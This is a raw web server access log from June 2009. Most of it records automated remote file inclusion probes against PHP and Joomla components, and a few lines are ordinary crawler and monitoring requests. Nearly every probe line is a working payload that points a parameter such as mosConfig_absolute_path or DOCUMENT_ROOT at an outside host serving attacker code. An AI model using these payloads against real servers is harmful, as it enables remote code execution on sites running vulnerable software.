213.189.224.21 - - [21/Jun/2009:05:50:25 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
77.222.40.12 - - [21/Jun/2009:05:51:20 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.222.40.12 - - [21/Jun/2009:05:51:20 -0400] "GET //index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.222.40.12 - - [21/Jun/2009:05:51:20 -0400] "GET /logs//index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.234.107.233 - - [21/Jun/2009:05:51:39 -0400] "GET /logs/access_log.Q109061800%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
213.189.224.21 - - [21/Jun/2009:05:51:39 -0400] "GET /logs/error_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.811"
77.222.40.12 - - [21/Jun/2009:05:51:41 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.250.85.185 - - [21/Jun/2009:05:51:48 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
211.230.156.161 - - [21/Jun/2009:05:51:57 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
211.230.156.161 - - [21/Jun/2009:05:51:57 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
211.230.156.161 - - [21/Jun/2009:05:51:57 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
83.170.83.216 - - [21/Jun/2009:05:52:01 -0400] "GET /http://galera.pt/log.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.808"
77.222.40.12 - - [21/Jun/2009:05:52:24 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.222.40.12 - - [21/Jun/2009:05:52:31 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.224.21 - - [21/Jun/2009:05:53:04 -0400] "GET /logs/access_log.Q109061800%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.811"
83.98.209.71 - - [21/Jun/2009:05:53:25 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:53:25 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:53:26 -0400] "GET /logs/access_log.Q109051900//tools/send_reminders.php?noSet=0&includedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.230.156.161 - - [21/Jun/2009:05:53:27 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
211.230.156.161 - - [21/Jun/2009:05:54:30 -0400] "GET /logs/access_log.Q109061800%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:05:54:47 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://for.caucasus.net/id.txt???? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:05:54:47 -0400] "GET /logs/access_log.Q109060600//?_SERVER%5BDOCUMENT_ROOT%5D=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:05:54:47 -0400] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://for.caucasus.net/id.txt???? HTTP/1.1" 200 6381 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:05:54:47 -0400] "GET /logs/access_log.Q109051300//?_SERVER%5BDOCUMENT_ROOT%5D=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
67.15.171.4 - - [21/Jun/2009:05:55:06 -0400] "GET /popup.php?path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.15.171.4 - - [21/Jun/2009:05:55:06 -0400] "GET /popup.php?path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.15.171.4 - - [21/Jun/2009:05:55:06 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.15.171.4 - - [21/Jun/2009:05:55:06 -0400] "GET /logs/popup.php?path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.15.171.4 - - [21/Jun/2009:05:55:07 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.15.171.4 - - [21/Jun/2009:05:55:07 -0400] "GET /logs/popup.php?path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.165.73.157 - - [21/Jun/2009:05:55:58 -0400] "GET /logs/access_log.Q109061800%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
121.165.73.157 - - [21/Jun/2009:05:55:58 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.165.73.157 - - [21/Jun/2009:05:55:58 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.165.73.157 - - [21/Jun/2009:05:56:06 -0400] "GET /logs/access_log.Q109061500%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.15.171.4 - - [21/Jun/2009:05:56:09 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.15.171.4 - - [21/Jun/2009:05:56:10 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.170.83.216 - - [21/Jun/2009:05:56:12 -0400] "GET /http://galera.pt/log.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.808"
94.23.200.54 - - [21/Jun/2009:05:56:29 -0400] "GET /logs/access_log.Q109061100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:05:56:29 -0400] "GET /logs/access_log.Q109060300%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:05:58:06 -0400] "GET /logs/access_log.Q109060600%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
209.59.12.99 - - [21/Jun/2009:05:58:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [21/Jun/2009:05:58:41 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.165.73.157 - - [21/Jun/2009:05:58:44 -0400] "GET /logs/access_log.Q109061500//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:05:59:10 -0400] "GET /images/download_cat_X.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
83.170.83.216 - - [21/Jun/2009:05:59:25 -0400] "GET /logs/access_log.Q109061100/http://galera.pt/log.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
83.170.83.216 - - [21/Jun/2009:05:59:26 -0400] "GET /http://galera.pt/log.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.808"
83.170.83.216 - - [21/Jun/2009:05:59:26 -0400] "GET /logs/http://galera.pt/log.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
83.170.83.216 - - [21/Jun/2009:06:00:02 -0400] "GET /logs/access_log.Q109050800/http://galera.pt/log.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
83.98.209.71 - - [21/Jun/2009:06:00:06 -0400] "GET /logs/access_log.Q109061500%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.6.17.151 - - [21/Jun/2009:06:01:08 -0400] "GET /logs/error_log.Q107060200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.200.37.14 - - [21/Jun/2009:06:02:42 -0400] "GET /logs/access_log.Q109052800//include/admin.lib.inc.php?site_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.200.37.14 - - [21/Jun/2009:06:02:42 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.200.37.14 - - [21/Jun/2009:06:02:42 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:06:02:46 -0400] "GET /logs/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:06:02:46 -0400] "GET /errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:06:03:00 -0400] "GET /errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:06:03:00 -0400] "GET /logs/access_log.Q109060300%20%20/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:06:03:00 -0400] "GET /logs/access_log.Q109060300%20%20/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:06:03:00 -0400] "GET /logs/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:06:03:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.200.37.14 - - [21/Jun/2009:06:05:19 -0400] "GET /logs/access_log.Q109052800%20%20//include/admin.lib.inc.php?site_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:05:33 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:05:33 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:05:33 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:05:40 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:05:54 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:05:54 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:05:54 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:06:02 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.15.171.4 - - [21/Jun/2009:06:06:42 -0400] "GET /logs/access_log.Q109060400/popup.php?path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.15.171.4 - - [21/Jun/2009:06:06:44 -0400] "GET /logs/access_log.Q109060400/popup.php?path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.15.171.4 - - [21/Jun/2009:06:06:44 -0400] "GET /logs/access_log.Q109053000/popup.php?path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.15.171.4 - - [21/Jun/2009:06:06:46 -0400] "GET /logs/access_log.Q109053000/popup.php?path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:06:06:52 -0400] "GET /logs/access_log.Q109060300/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.246.20.221 - - [21/Jun/2009:06:06:57 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.246.20.221 - - [21/Jun/2009:06:07:48 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:06:07:54 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:06:07:54 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:06:07:55 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:06:08:04 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:08:19 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:08:19 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:08:19 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:06:08:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.43.202.66 - - [21/Jun/2009:06:08:33 -0400] "GET /logs/access_log.Q109060300/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:08:41 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:08:41 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.246.20.221 - - [21/Jun/2009:06:09:26 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.170.83.216 - - [21/Jun/2009:06:10:24 -0400] "GET /logs/access_log.Q109050800/http://galera.pt/log.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
83.170.83.216 - - [21/Jun/2009:06:10:26 -0400] "GET /http://galera.pt/log.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.808"
83.170.83.216 - - [21/Jun/2009:06:10:28 -0400] "GET /logs/http://galera.pt/log.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
217.147.29.190 - - [21/Jun/2009:06:11:22 -0400] "GET ///index.php?DOCUMENT_ROOT=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:11:22 -0400] "GET /logs///index.php?DOCUMENT_ROOT=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:11:25 -0400] "GET /logs/access_log.Q109050800///index.php?DOCUMENT_ROOT=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [21/Jun/2009:06:12:55 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [21/Jun/2009:06:12:55 -0400] "GET /logs/access_log.Q109053100/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [21/Jun/2009:06:12:55 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:13:02 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:06:13:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.200.36.154 - - [21/Jun/2009:06:13:30 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
212.200.36.154 - - [21/Jun/2009:06:13:34 -0400] "GET /logs/access_log.Q109053100%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
212.200.36.154 - - [21/Jun/2009:06:13:34 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:06:13:59 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:06:14:14 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:06:14:14 -0400] "GET /logs/access_log.Q109061500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:14:31 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.808"
217.147.29.190 - - [21/Jun/2009:06:14:32 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.808"
218.246.20.221 - - [21/Jun/2009:06:14:32 -0400] "GET /logs/access_log.Q109051900/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.walji-co.com/id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:14:36 -0400] "GET /logs/access_log.Q109050800%20%20///index.php?DOCUMENT_ROOT=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:14:36 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.808"
222.122.142.249 - - [21/Jun/2009:06:14:39 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:06:14:39 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:15:05 -0400] "GET /logs/access_log.Q109060600%20%20///index.php?DOCUMENT_ROOT=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.170.83.216 - - [21/Jun/2009:06:15:06 -0400] "GET /logs/access_log.Q109051700/http://galera.pt/log.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
83.98.209.71 - - [21/Jun/2009:06:15:50 -0400] "GET //main.php?sayfa=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:06:15:50 -0400] "GET /logs//main.php?sayfa=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:06:15:50 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:06:15:51 -0400] "GET /images/store_blades_section.jpg HTTP/1.1" 200 24174 "-" "Googlebot-Image/1.0"
83.98.209.71 - - [21/Jun/2009:06:15:52 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:16:57 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.808"
66.249.71.54 - - [21/Jun/2009:06:17:10 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309C144889229200E94F04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [21/Jun/2009:06:17:20 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309C144888621200E54F04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [21/Jun/2009:06:17:32 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309C144888827200E54F04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [21/Jun/2009:06:17:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309C144888D23200EB4F04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [21/Jun/2009:06:17:52 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309C144888B24200E54F04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.227.193.198 - - [21/Jun/2009:06:18:06 -0400] "GET /logs/access_log.Q109060300/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:06:18:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [21/Jun/2009:06:18:29 -0400] "GET /logs/access_log.Q109061500//tools/send_reminders.php?noSet=0&includedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:06:18:46 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
